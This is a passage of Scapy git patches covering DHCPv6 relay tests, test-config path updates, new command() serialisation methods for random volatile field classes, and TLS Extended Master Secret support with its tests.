DHCP6_RelayForward - Basic Dissection +a=DHCP6_RelayForward(b'\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.msgtype == 12 and a.hopcount == 0 and a.linkaddr == "::" and a.peeraddr == "::" + += DHCP6_RelayForward - Dissection with options +a = DHCP6_RelayForward(b'\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x04\x03\x01\x00\x00') +a.msgtype == 12 and DHCP6OptRelayMsg in a and isinstance(a.message, DHCP6_Request) + += DHCP6_RelayForward - Advanced dissection +s = b'`\x00\x00\x00\x002\x11@\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x02#\x02#\x002\xf0\xaf\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x04\x01\x00\x00\x00' +p = IPv6(s) +assert DHCP6OptRelayMsg in p and isinstance(p.message, DHCP6_Solicit) + + +############ +############ ++ Test DHCP6 Messages - DHCP6OptRelayMsg + += DHCP6OptRelayMsg - Basic Instantiation +raw(DHCP6OptRelayMsg(optcode=37)) == b'\x00%\x00\x04\x00\x00\x00\x00' + += DHCP6OptRelayMsg - Basic Dissection +a = DHCP6OptRelayMsg(b'\x00\r\x00\x00') +a.optcode == 13 and a.optlen == 0 and isinstance(a.message, DHCP6) + += DHCP6OptRelayMsg - Embedded DHCP6 packet Instantiation +raw(DHCP6OptRelayMsg(message=DHCP6_Solicit())) == b'\x00\t\x00\x04\x01\x00\x00\x00' + += DHCP6OptRelayMsg - Embedded DHCP6 packet Dissection +p = DHCP6OptRelayMsg(b'\x00\t\x00\x04\x01\x00\x00\x00') +isinstance(p.message, DHCP6_Solicit) + + +############ +############ ++ Test DHCP6 Messages - DHCP6_RelayReply + += DHCP6_RelayReply - Basic Instantiation +raw(DHCP6_RelayReply()) == b'\r\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + += DHCP6_RelayReply - Basic Dissection +a=DHCP6_RelayReply(b'\r\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +a.msgtype == 13 and a.hopcount == 0 and a.linkaddr == "::" and a.peeraddr == "::" + + From 1c4819637679288d22a3e8ad753d4592126b981f Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Mon, 24 Aug 2020 15:22:45 +0200 Subject: [PATCH 0294/1632] Load *.uts from test/scapy/layers/ --- test/configs/bsd.utsc | 1 + test/configs/linux.utsc | 1 + test/configs/solaris.utsc | 1 + test/configs/windows.utsc | 1 + test/configs/windows2.utsc | 1 + 5 files changed, 5 insertions(+) diff --git a/test/configs/bsd.utsc b/test/configs/bsd.utsc index 5f74a4760bb..bbdf5a6f88b 100644 --- a/test/configs/bsd.utsc +++ b/test/configs/bsd.utsc @@ -1,6 +1,7 @@ { "testfiles": [ "test/*.uts", + "test/scapy/layers/*.uts", "test/contrib/automotive/*.uts", "test/contrib/automotive/obd/*.uts", "test/contrib/automotive/gm/*.uts", diff --git a/test/configs/linux.utsc b/test/configs/linux.utsc index 242602bc2b9..4e8d15dc295 100644 --- a/test/configs/linux.utsc +++ b/test/configs/linux.utsc @@ -1,6 +1,7 @@ { "testfiles": [ "test/*.uts", + "test/scapy/layers/*.uts", "test/contrib/*.uts", "test/contrib/automotive/*.uts", "test/contrib/automotive/obd/*.uts", diff --git a/test/configs/solaris.utsc b/test/configs/solaris.utsc index fdcc035dfca..6a401f4425a 100644 --- a/test/configs/solaris.utsc +++ b/test/configs/solaris.utsc @@ -1,6 +1,7 @@ { "testfiles": [ "test/*.uts", + "test/scapy/layers/*.uts", "test/contrib/automotive/*.uts", "test/contrib/automotive/obd/*.uts", "test/contrib/automotive/gm/*.uts", diff --git a/test/configs/windows.utsc b/test/configs/windows.utsc index 5b266fea781..74f39073d6e 100644 --- a/test/configs/windows.utsc +++ b/test/configs/windows.utsc @@ -1,6 +1,7 @@ { "testfiles": [ "test\\*.uts", + "test\\scapy\\layers\\*.uts", "test\\tls\\tests_tls_netaccess.uts", "test\\contrib\\automotive\\obd\\*.uts", "test\\contrib\\automotive\\gm\\*.uts", diff --git a/test/configs/windows2.utsc b/test/configs/windows2.utsc index cb7ac56266a..5650a98dfe7 100644 --- a/test/configs/windows2.utsc +++ b/test/configs/windows2.utsc @@ -1,6 +1,7 @@ { "testfiles": [ "*.uts", + "scapy\\layers\\*.uts", "test\\contrib\\automotive\\obd\\*.uts", "test\\contrib\\automotive\\gm\\*.uts", "test\\contrib\\automotive\\bmw\\*.uts", From 3278fed750675b415f79656be540104fbf1ab991 Mon Sep 17 00:00:00 2001 From: Thomas Faivre Date: Tue, 22 Sep 2020 12:22:54 +0200 Subject: [PATCH 0295/1632] volatile: add command method to be used in Packet.command() When a VolatileValue subclass is used inside a Packet, the command() method returns a string that get a Syntax Error when evaluated, e.g.: > ICMPv6NIQueryNOOP(nonce=) Add a command() method to the VolatileValue class so that it can be handled properly. The _command_args() method is used to defined the string used as argument for a given VolatileValue subclass. Default values are not displayed. Fixes #2828. Signed-off-by: Thomas Faivre --- scapy/packet.py | 2 + scapy/volatile.py | 188 +++++++++++++++++++++++++++++++++++++++++++- test/regression.uts | 69 +++++++++++----- 3 files changed, 238 insertions(+), 21 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index 6154caeffd3..88ec481d9bd 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -1466,6 +1466,8 @@ def command(self): fv = "[%s]" % ",".join(map(Packet.command, fv)) elif isinstance(fld, FlagsField): fv = int(fv) + elif callable(getattr(fv, 'command', None)): + fv = fv.command() else: fv = repr(fv) f.append("%s=%s" % (fn, fv)) diff --git a/scapy/volatile.py b/scapy/volatile.py index 701f678bd47..5587c7ce9f3 100644 --- a/scapy/volatile.py +++ b/scapy/volatile.py @@ -85,6 +85,12 @@ class VolatileValue(object): def __repr__(self): return "<%s>" % self.__class__.__name__ + def _command_args(self): + return '' + + def command(self): + return "%s(%s)" % (self.__class__.__name__, self._command_args()) + def __eq__(self, other): x = self._fix() y = other._fix() if isinstance(other, VolatileValue) else other @@ -198,6 +204,11 @@ def __init__(self, min, max): self.min = min self.max = max + def _command_args(self): + if self.__class__.__name__ == 'RandNum': + return "min=%r, max=%r" % (self.min, self.max) + return super(RandNum, self)._command_args() + def _fix(self): return random.randrange(self.min, self.max + 1) @@ -217,6 +228,9 @@ def __init__(self, alpha, beta): self.alpha = alpha self.beta = beta + def _command_args(self): + return "alpha=%r, beta=%r" % (self.alpha, self.beta) + def _fix(self): return int(round(random.gammavariate(self.alpha, self.beta))) @@ -226,6 +240,9 @@ def __init__(self, mu, sigma): self.mu = mu self.sigma = sigma + def _command_args(self): + return "mu=%r, sigma=%r" % (self.mu, self.sigma) + def _fix(self): return int(round(random.gauss(self.mu, self.sigma))) @@ -235,6 +252,12 @@ def __init__(self, lambd, base=0): self.lambd = lambd self.base = base + def _command_args(self): + ret = "lambd=%r" % self.lambd + if self.base != 0: + ret += ", base=%r" % self.base + return ret + def _fix(self): return self.base + int(round(random.expovariate(self.lambd))) @@ -243,9 +266,16 @@ class RandEnum(RandNum): """Instances evaluate to integer sampling without replacement from the given interval""" # noqa: E501 def __init__(self, min, max, seed=None): + self._seed = seed self.seq = RandomEnumeration(min, max, seed) super(RandEnum, self).__init__(min, max) + def _command_args(self): + ret = "min=%r, max=%r" % (self.min, self.max) + if self._seed: + ret += ", seed=%r" % self._seed + return ret + def _fix(self): return next(self.seq) @@ -337,6 +367,13 @@ def __init__(self, enum, seed=None): self.enum = list(enum) RandEnum.__init__(self, 0, len(self.enum) - 1, seed) + def _command_args(self): + # Note: only outputs the list of keys, but values are irrelevant anyway + ret = "enum=%r" % self.enum + if self._seed: + ret += ", seed=%r" % self._seed + return ret + def _fix(self): return self.enum[next(self.seq)] @@ -347,17 +384,34 @@ def __init__(self, *args): raise TypeError("RandChoice needs at least one choice") self._choice = list(args) + def _command_args(self): + return ", ".join(self._choice) + def _fix(self): return random.choice(self._choice) class RandString(RandField): - def __init__(self, size=None, chars=b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"): # noqa: E501 + _DEFAULT_CHARS = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" # noqa: E501 + + def __init__(self, size=None, chars=_DEFAULT_CHARS): if size is None: size = RandNumExpo(0.01) self.size = size self.chars = chars + def _command_args(self): + ret = "" + if isinstance(self.size, VolatileValue): + if self.size.lambd != 0.01 or self.size.base != 0: + ret += "size=%r" % self.size.command() + else: + ret += "size=%r" % self.size + + if self.chars != self._DEFAULT_CHARS: + ret += ", chars=%r" % self.chars + return ret + def _fix(self): s = b"" for _ in range(self.size): @@ -379,21 +433,42 @@ class RandBin(RandString): def __init__(self, size=None): super(RandBin, self).__init__(size=size, chars=b"".join(chb(c) for c in range(256))) # noqa: E501 + def _command_args(self): + if not isinstance(self.size, VolatileValue): + return "size=%r" % self.size + + if isinstance(self.size, RandNumExpo) and \ + self.size.lambd == 0.01 and self.size.base == 0: + # Default size for RandString, skip + return "" + return "size=%r" % self.size.command() + class RandTermString(RandBin): def __init__(self, size, term): self.term = bytes_encode(term) super(RandTermString, self).__init__(size=size) + def _command_args(self): + return ", ".join((super(RandTermString, self)._command_args(), + "term=%r" % self.term)) + def _fix(self): return RandBin._fix(self) + self.term class RandIP(RandString): - def __init__(self, iptemplate="0.0.0.0/0"): + _DEFAULT_IPTEMPLATE = "0.0.0.0/0" + + def __init__(self, iptemplate=_DEFAULT_IPTEMPLATE): RandString.__init__(self) self.ip = Net(iptemplate) + def _command_args(self): + if self.ip.repr == self._DEFAULT_IPTEMPLATE: + return "" + return "iptemplate=%r" % self.ip.repr + def _fix(self): return self.ip.choice() @@ -401,6 +476,7 @@ def _fix(self): class RandMAC(RandString): def __init__(self, template="*"): RandString.__init__(self) + self._template = template template += ":*:*:*:*:*" template = template.split(":") self.mac = () @@ -414,6 +490,11 @@ def __init__(self, template="*"): v = int(template[i], 16) self.mac += (v,) + def _command_args(self): + if self._template == "*": + return "" + return "template=%r" % self._template + def _fix(self): return "%02x:%02x:%02x:%02x:%02x:%02x" % self.mac @@ -444,6 +525,11 @@ def __init__(self, ip6template="**"): self.variable = "" in self.sp self.multi = self.sp.count("**") + def _command_args(self): + if self.tmpl == "**": + return "" + return "ip6template=%r" % self.tmpl + def _fix(self): nbm = self.multi ip = [] @@ -485,6 +571,25 @@ def __init__(self, fmt=None, depth=RandNumExpo(0.1), idnum=RandNumExpo(0.01)): self.depth = depth self.idnum = idnum + def _command_args(self): + ret = [] + if self.fmt: + ret.append("fmt=%r" % self.ori_fmt) + + if not isinstance(self.depth, VolatileValue): + ret.append("depth=%r" % self.depth) + elif not isinstance(self.depth, RandNumExpo) or \ + self.depth.lambd != 0.1 or self.depth.base != 0: + ret.append("depth=%s" % self.depth.command()) + + if not isinstance(self.idnum, VolatileValue): + ret.append("idnum=%r" % self.idnum) + elif not isinstance(self.idnum, RandNumExpo) or \ + self.idnum.lambd != 0.01 or self.idnum.base != 0: + ret.append("idnum=%s" % self.idnum.command()) + + return ", ".join(ret) + def __repr__(self): if self.ori_fmt is None: return "<%s>" % self.__class__.__name__ @@ -513,6 +618,12 @@ def __init__(self, regexp, lambda_=0.3,): self._regexp = regexp self._lambda = lambda_ + def _command_args(self): + ret = "regexp=%r" % self._regexp + if self._lambda != 0.3: + ret += ", lambda_=%r" % self._lambda + return ret + special_sets = { "[:alnum:]": "[a-zA-Z0-9]", "[:alpha:]": "[a-zA-Z]", @@ -700,6 +811,8 @@ def make_power_of_two(end): return {sign * 2**i for i in range(end_n)} def __init__(self, mn, mx): + self._mn = mn + self._mx = mx sing = {0, mn, mx, int((mn + mx) / 2)} sing |= self.make_power_of_two(mn) sing |= self.make_power_of_two(mx) @@ -712,6 +825,11 @@ def __init__(self, mn, mx): super(RandSingNum, self).__init__(*sing) self._choice.sort() + def _command_args(self): + if self.__class__.__name__ == 'RandSingNum': + return "mn=%r, mx=%r" % (self._mn, self._mx) + return super(RandSingNum, self)._command_args() + class RandSingByte(RandSingNum): def __init__(self): @@ -811,6 +929,9 @@ def __init__(self): "foo.exe\\", ] super(RandSingString, self).__init__(*choices_list) + def _command_args(self): + return "" + def __str__(self): return str(self._fix()) @@ -821,6 +942,7 @@ def __bytes__(self): class RandPool(RandField): def __init__(self, *args): """Each parameter is a volatile object or a couple (volatile object, weight)""" # noqa: E501 + self._args = args pool = [] for p in args: w = 1 @@ -829,6 +951,15 @@ def __init__(self, *args): pool += [p] * w self._pool = pool + def _command_args(self): + ret = [] + for p in self._args: + if isinstance(p, tuple): + ret.append("(%s, %r)" % (p[0].command(), p[1])) + else: + ret.append(p.command()) + return ", ".join(ret) + def _fix(self): r = random.choice(self._pool) return r._fix() @@ -872,10 +1003,14 @@ class RandUUID(RandField): def __init__(self, template=None, node=None, clock_seq=None, namespace=None, name=None, version=None): + self._template = template + self._ori_version = version + self.uuid_template = None self.node = None self.clock_seq = None self.namespace = None + self.name = None self.node = None self.version = None @@ -941,6 +1076,22 @@ def __init__(self, template=None, node=None, clock_seq=None, "did not specify version, you need to " "specify it explicitly.") + def _command_args(self): + ret = [] + if self._template: + ret.append("template=%r" % self._template) + if self.node: + ret.append("node=%r" % self.node) + if self.clock_seq: + ret.append("clock_seq=%r" % self.clock_seq) + if self.namespace: + ret.append("namespace=%r" % self.namespace) + if self.name: + ret.append("name=%r" % self.name) + if self._ori_version: + ret.append("version=%r" % self._ori_version) + return ", ".join(ret) + def _fix(self): if self.uuid_template: return uuid.UUID(("%08x%04x%04x" + ("%02x" * 8)) @@ -962,6 +1113,9 @@ def _fix(self): class AutoTime(_RandNumeral): def __init__(self, base=None, diff=None): + self._base = base + self._ori_diff = diff + if diff is not None: self.diff = diff elif base is None: @@ -969,6 +1123,14 @@ def __init__(self, base=None, diff=None): else: self.diff = time.time() - base + def _command_args(self): + ret = [] + if self._base: + ret.append("base=%r" % self._base) + if self._ori_diff: + ret.append("diff=%r" % self._ori_diff) + return ", ".join(ret) + def _fix(self): return time.time() - self.diff @@ -1002,6 +1164,9 @@ class DelayedEval(VolatileValue): def __init__(self, expr): self.expr = expr + def _command_args(self): + return "expr=%r" % self.expr + def _fix(self): return eval(self.expr) @@ -1012,6 +1177,16 @@ def __init__(self, start=0, step=1, restart=-1): self.step = step self.restart = restart + def _command_args(self): + ret = [] + if self.start: + ret.append("start=%r" % self.start) + if self.step != 1: + ret.append("step=%r" % self.step) + if self.restart != -1: + ret.append("restart=%r" % self.restart) + return ", ".join(ret) + def _fix(self): v = self.val if self.val == self.restart: @@ -1027,6 +1202,15 @@ def __init__(self, s, p=0.01, n=None): self.p = p self.n = n + def _command_args(self): + ret = [] + ret.append("s=%r" % self.s) + if self.p != 0.01: + ret.append("p=%r" % self.p) + if self.n: + ret.append("n=%r" % self.n) + return ", ".join(ret) + def _fix(self): return corrupt_bytes(self.s, self.p, self.n) diff --git a/test/regression.uts b/test/regression.uts index 18c4fa8fc41..438e7568b89 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -10229,22 +10229,27 @@ random.seed(0x2807) r6 = RandIP6() assert(r6 == ("d279:1205:e445:5a9f:db28:efc9:afd7:f594" if six.PY2 else "240b:238f:b53f:b727:d0f9:bfc4:2007:e265")) +assert(r6.command() == "RandIP6()") random.seed(0x2807) -r6 = RandIP6("2001:db8::-") +r6 = RandIP6("2001:db8::-") assert(r6 == ("2001:0db8::e445" if six.PY2 else "2001:0db8::b53f")) +assert(r6.command() == "RandIP6(ip6template='2001:db8::-')") r6 = RandIP6("2001:db8::*") assert(r6 == ("2001:0db8::efc9" if six.PY2 else "2001:0db8::bfc4")) +assert(r6.command() == "RandIP6(ip6template='2001:db8::*')") = RandMAC random.seed(0x2807) -rm = RandMAC() +rm = RandMAC() assert(rm == ("d2:12:e4:5a:db:ef" if six.PY2 else "24:23:b5:b7:d0:bf")) +assert(rm.command() == "RandMAC()") rm = RandMAC("00:01:02:03:04:0-7") assert(rm == ("00:01:02:03:04:05" if six.PY2 else "00:01:02:03:04:01")) +assert(rm.command() == "RandMAC(template='00:01:02:03:04:0-7')") = RandOID @@ -10252,18 +10257,25 @@ assert(rm == ("00:01:02:03:04:05" if six.PY2 else "00:01:02:03:04:01")) random.seed(0x2807) ro = RandOID() assert(ro == "7.222.44.194.276.116.320.6.84.97.31.5.25.20.13.84.104.18") +assert(ro.command() == "RandOID()") ro = RandOID("1.2.3.*") assert(ro == "1.2.3.41") +assert(ro.command() == "RandOID(fmt='1.2.3.*')") ro = RandOID("1.2.3.0-28") assert(ro == ("1.2.3.11" if six.PY2 else "1.2.3.12")) +assert(ro.command() == "RandOID(fmt='1.2.3.0-28')") + +ro = RandOID("1.2.3.0-28", depth=RandNumExpo(0.2), idnum=RandNumExpo(0.02)) +assert(ro.command() == "RandOID(fmt='1.2.3.0-28', depth=RandNumExpo(lambd=0.2), idnum=RandNumExpo(lambd=0.02))") = RandRegExp random.seed(0x2807) rex = RandRegExp("[g-v]* @? [0-9]{3} . (g|v)") bytes(rex) == ('vmuvr @ 906 \x9e g' if six.PY2 else b'irrtv @ 517 \xc2\xb8 v') +assert(rex.command() == "RandRegExp(regexp='[g-v]* @? [0-9]{3} . (g|v)')") rex = RandRegExp("[:digit:][:space:][:word:]") assert re.match(b"\\d\\s\\w", bytes(rex)) @@ -10272,33 +10284,37 @@ assert re.match(b"\\d\\s\\w", bytes(rex)) random.seed(0x2807) cb = CorruptedBytes("ABCDE", p=0.5) +assert(cb.command() == "CorruptedBytes(s='ABCDE', p=0.5)") assert(sane(raw(cb)) in [".BCD)", "&BCDW"]) cb = CorruptedBits("ABCDE", p=0.2) +assert(cb.command() == "CorruptedBits(s='ABCDE', p=0.2)") assert(sane(raw(cb)) in ["ECk@Y", "QB.P."]) = RandEnumKeys random.seed(0x2807) rek = RandEnumKeys({'a': 1, 'b': 2, 'c': 3}, seed=0x2807) rek.enum.sort() +assert(rek.command() == "RandEnumKeys(enum=['a', 'b', 'c'], seed=10247)") r = str(rek) -r assert(r == ('c' if six.PY2 else 'a')) = RandSingNum random.seed(0x2807) -rs = RandSingNum(-28, 7)._fix() -rs -assert(rs in [2, 3]) +rs = RandSingNum(-28, 7) +assert(rs._fix() in [2, 3]) +assert(rs.command() == "RandSingNum(mn=-28, mx=7)") = Rand* random.seed(0x2807) rss = RandSingString() assert(rss == ("CON:" if six.PY2 else "foo.exe:")) +assert(rss.command() == "RandSingString()") random.seed(0x2807) rts = RandTermString(4, "scapy") assert(sane(raw(rts)) in ["...Zscapy", "$#..scapy"]) +assert(rts.command() == "RandTermString(size=4, term=%s'scapy')" % '' if six.PY2 else 'b') = RandInt (test __bool__) a = "True" if RandNum(False, True) else "False" @@ -10307,22 +10323,30 @@ assert a in ["True", "False"] = Various volatiles random.seed(0x2807) -assert RandNumGamma(1, 42)._fix() in (8, 73) +rng = RandNumGamma(1, 42) +assert rng._fix() in (8, 73) +assert rng.command() == "RandNumGamma(alpha=1, beta=42)" random.seed(0x2807) -assert RandNumGauss(1, 42) == 8 +rng = RandNumGauss(1, 42) +assert rng._fix() == 8 +assert rng.command() == "RandNumGauss(mu=1, sigma=42)" -print("RandEnum()", RandEnum(1, 42, seed=0x2807)._fix()) -assert RandEnum(1, 42, seed=0x2807) == (13 if six.PY2 else 37) +renum = RandEnum(1, 42, seed=0x2807) +assert renum == (13 if six.PY2 else 37) +assert renum.command() == "RandEnum(min=1, max=42, seed=10247)" -print("RandPool()", RandPool((IncrementalValue(), 42), (IncrementalValue(), 0))._fix()) -assert RandPool((IncrementalValue(), 42), (IncrementalValue(), 0)) == 0 +rp = RandPool((IncrementalValue(), 42), (IncrementalValue(), 0)) +assert rp == 0 +assert rp.command() == "RandPool((IncrementalValue(), 42), (IncrementalValue(), 0))" -print("DelayedEval()", DelayedEval("3 + 1")._fix()) -assert DelayedEval("3 + 1") == 4 +de = DelayedEval("3 + 1") +assert de == 4 +assert de.command() == "DelayedEval(expr='3 + 1')" v = IncrementalValue(restart=2) assert v == 0 and v == 1 and v == 2 and v == 0 +assert v.command() == "IncrementalValue(restart=2)" ############ @@ -11583,8 +11607,9 @@ RANDUUID_FIXED = uuid.uuid4() = RandUUID default behaviour -u = RandUUID()._fix() -assert u.version == 4 +ru = RandUUID() +assert ru._fix().version == 4 +assert ru.command() == "RandUUID()" = RandUUID incorrect implicit args @@ -11626,7 +11651,9 @@ u = RandUUID(version=1, clock_seq=0x1234)._fix() assert u.version == 1 assert u.clock_seq == 0x1234 -u = RandUUID(version=1, node=0x1234, clock_seq=0x1bcd)._fix() +ru = RandUUID(version=1, node=0x1234, clock_seq=0x1bcd) +assert ru.command() == "RandUUID(node=4660, clock_seq=7117, version=1)" +u = ru._fix() assert u.version == 1 assert u.node == 0x1234 assert u.clock_seq == 0x1bcd @@ -11654,8 +11681,10 @@ assert expect_exception(ValueError, lambda: RandUUID(version=1, name="scapy")) = RandUUID v5 UUID -u = RandUUID(version=5, namespace=RANDUUID_FIXED, name="scapy")._fix() +ru = RandUUID(version=5, namespace=RANDUUID_FIXED, name="scapy") +u = ru._fix() assert u.version == 5 +assert ru.command() == "RandUUID(namespace=%r, name='scapy', version=5)" % RANDUUID_FIXED u2 = RandUUID(version=5, namespace=RANDUUID_FIXED, name="scapy")._fix() assert u2.version == 5 @@ -11695,7 +11724,9 @@ assert re.match(r'[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}', str(RandUUID()), r = RandUUID with a static part * RandUUID template can contain static part such a 01234567-89ab-*-01*-*****ef -assert re.match(r'01234567-89ab-[0-9a-f]{4}-01[0-9a-f]{2}-[0-9a-f]{10}ef', str(RandUUID('01234567-89ab-*-01*-*****ef')), re.I) is not None +ru = RandUUID('01234567-89ab-*-01*-*****ef') +assert re.match(r'01234567-89ab-[0-9a-f]{4}-01[0-9a-f]{2}-[0-9a-f]{10}ef', str(ru), re.I) is not None +assert ru.command() == "RandUUID(template='01234567-89ab-*-01*-*****ef')" = RandUUID with a range part * RandUUID template can contain a part with a range of values such a 01234567-89ab-*-01*-****c0:c9ef From ba640870b2cb26a5deda3a175ab9cebeb96a69f2 Mon Sep 17 00:00:00 2001 From: Adam Janovsky Date: Thu, 23 Aug 2018 15:03:10 +0200 Subject: [PATCH 0296/1632] Added extms support to TLS --- scapy/layers/tls/crypto/prf.py | 13 ++++++++++--- scapy/layers/tls/handshake.py | 31 ++++++++++++++++++++++++++++++- scapy/layers/tls/keyexchange.py | 21 +++++++++++++++------ scapy/layers/tls/session.py | 10 +++++++++- test/tls.uts | 31 +++++++++++++++++++++++++++++++ 5 files changed, 95 insertions(+), 11 deletions(-) diff --git a/scapy/layers/tls/crypto/prf.py b/scapy/layers/tls/crypto/prf.py index 9cd2b79f88d..5d1b39b6f8d 100644 --- a/scapy/layers/tls/crypto/prf.py +++ b/scapy/layers/tls/crypto/prf.py @@ -207,19 +207,26 @@ def __init__(self, hash_name="SHA256", tls_version=0x0303): else: warning("Unknown TLS version") - def compute_master_secret(self, pre_master_secret, - client_random, server_random): + def compute_master_secret(self, pre_master_secret, client_random, + server_random, extms=False, handshake_hash=None): """ Return the 48-byte master_secret, computed from pre_master_secret, client_random and server_random. See RFC 5246, section 6.3. + Supports Extended Master Secret Derivation, see RFC 7627 """ seed = client_random + server_random + label = b'master secret' + + if extms is True and handshake_hash is not None: + seed = handshake_hash + label = b'extended master secret' + if self.tls_version < 0x0300: return None elif self.tls_version == 0x0300: return self.prf(pre_master_secret, seed, 48) else: - return self.prf(pre_master_secret, b"master secret", seed, 48) + return self.prf(pre_master_secret, label, seed, 48) def derive_key_block(self, master_secret, server_random, client_random, req_len): diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 7a81acde443..61d4a9f843a 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -48,7 +48,8 @@ TLS_Ext_SignatureAlgorithms, TLS_Ext_SupportedVersion_SH, TLS_Ext_EarlyDataIndication, - _tls_hello_retry_magic) + _tls_hello_retry_magic, + TLS_Ext_ExtendedMasterSecret) from scapy.layers.tls.keyexchange import (_TLSSignature, _TLSServerParamsField, _TLSSignatureField, ServerRSAParams, SigAndHashAlgsField, _tls_hash_sig, @@ -111,6 +112,7 @@ def tls_session_update(self, msg_str): """ Covers both post_build- and post_dissection- context updates. """ + self.tls_session.handshake_messages.append(msg_str) self.tls_session.handshake_messages_parsed.append(self) @@ -540,6 +542,13 @@ def tls_session_update(self, msg_str): s.server_random = self.random_bytes s.sid = self.sid + # EXTMS + if self.ext: + for e in self.ext: + if isinstance(e, TLS_Ext_ExtendedMasterSecret): + self.tls_session.extms = True + break + cs_cls = None if self.cipher: cs_val = self.cipher @@ -1296,6 +1305,26 @@ def build(self, *args, **kargs): self.exchkeys = cls return _TLSHandshake.build(self, *args, **kargs) + def tls_session_update(self, msg_str): + """ + Finalize the EXTMS messages and compute the hash + """ + super(TLSClientKeyExchange, self).tls_session_update(msg_str) + + if self.tls_session.extms: + to_hash = b''.join(self.tls_session.handshake_messages) + if self.tls_session.tls_version >= 0x303: + # TLS 1.2 uses the default hash from cipher suite + hash_object = self.tls_session.pwcs.hash + self.tls_session.session_hash = hash_object.digest(to_hash) + else: + # Previous TLS version use concatenation of MD5 & SHA1 + from scapy.layers.tls.crypto.hash import Hash_MD5, Hash_SHA + self.tls_session.session_hash = ( + Hash_MD5().digest(to_hash) + Hash_SHA().digest(to_hash) + ) + self.tls_session.compute_ms_and_derive_keys() + ############################################################################### # Finished # diff --git a/scapy/layers/tls/keyexchange.py b/scapy/layers/tls/keyexchange.py index f20845b9a74..4bc43b009bf 100644 --- a/scapy/layers/tls/keyexchange.py +++ b/scapy/layers/tls/keyexchange.py @@ -743,7 +743,11 @@ def fill_missing(self): if s.client_kx_privkey and s.server_kx_pubkey: pms = s.client_kx_privkey.exchange(s.server_kx_pubkey) s.pre_master_secret = pms - s.compute_ms_and_derive_keys() + if not s.extms or s.session_hash: + # If extms is set (extended master secret), the key will + # need the session hash to be computed. This is provided + # by the TLSClientKeyExchange. Same in all occurrences + s.compute_ms_and_derive_keys() def post_build(self, pkt, pay): if not self.dh_Yc: @@ -773,7 +777,8 @@ def post_dissection(self, m): if s.server_kx_privkey and s.client_kx_pubkey: ZZ = s.server_kx_privkey.exchange(s.client_kx_pubkey) s.pre_master_secret = ZZ - s.compute_ms_and_derive_keys() + if not s.extms or s.session_hash: + s.compute_ms_and_derive_keys() def guess_payload_class(self, p): return Padding @@ -805,7 +810,8 @@ def fill_missing(self): if s.client_kx_privkey and s.server_kx_pubkey: pms = s.client_kx_privkey.exchange(ec.ECDH(), s.server_kx_pubkey) s.pre_master_secret = pms - s.compute_ms_and_derive_keys() + if not s.extms or s.session_hash: + s.compute_ms_and_derive_keys() def post_build(self, pkt, pay): if not self.ecdh_Yc: @@ -830,7 +836,8 @@ def post_dissection(self, m): if s.server_kx_privkey and s.client_kx_pubkey: ZZ = s.server_kx_privkey.exchange(ec.ECDH(), s.client_kx_pubkey) s.pre_master_secret = ZZ - s.compute_ms_and_derive_keys() + if not s.extms or s.session_hash: + s.compute_ms_and_derive_keys() # RSA Encryption (standard & export) @@ -893,7 +900,8 @@ def pre_dissect(self, m): warning(err) s.pre_master_secret = pms - s.compute_ms_and_derive_keys() + if not s.extms or s.session_hash: + s.compute_ms_and_derive_keys() return pms @@ -908,7 +916,8 @@ def post_build(self, pkt, pay): s = self.tls_session s.pre_master_secret = enc - s.compute_ms_and_derive_keys() + if not s.extms or s.session_hash: + s.compute_ms_and_derive_keys() if s.server_tmp_rsa_key is not None: enc = s.server_tmp_rsa_key.encrypt(pkt, t="pkcs") diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index fbc912d6855..6ab6d52fe60 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -453,6 +453,10 @@ def __init__(self, self.handshake_messages = [] self.handshake_messages_parsed = [] + # Flag, whether we derive the secret as Extended MS or not + self.extms = False + self.session_hash = None + # All exchanged TLS packets. # XXX no support for now # self.exchanged_pkts = [] @@ -526,10 +530,14 @@ def compute_master_secret(self): warning("Missing client_random while computing master_secret!") if self.server_random is None: warning("Missing server_random while computing master_secret!") + if self.extms and self.session_hash is None: + warning("Missing session hash while computing master secret!") ms = self.pwcs.prf.compute_master_secret(self.pre_master_secret, self.client_random, - self.server_random) + self.server_random, + self.extms, + self.session_hash) self.master_secret = ms if conf.debug_tls: log_runtime.debug("TLS: master secret: %s", repr_hex(ms)) diff --git a/test/tls.uts b/test/tls.uts index d9414a34cbe..32c40d0a766 100644 --- a/test/tls.uts +++ b/test/tls.uts @@ -979,6 +979,37 @@ assert(rec_fin.mac == b'\xecguD\xa8\x87$<7+\n\x94\x1e9\x96\xfa') assert(isinstance(rec_fin.msg[0], _TLSEncryptedContent)) 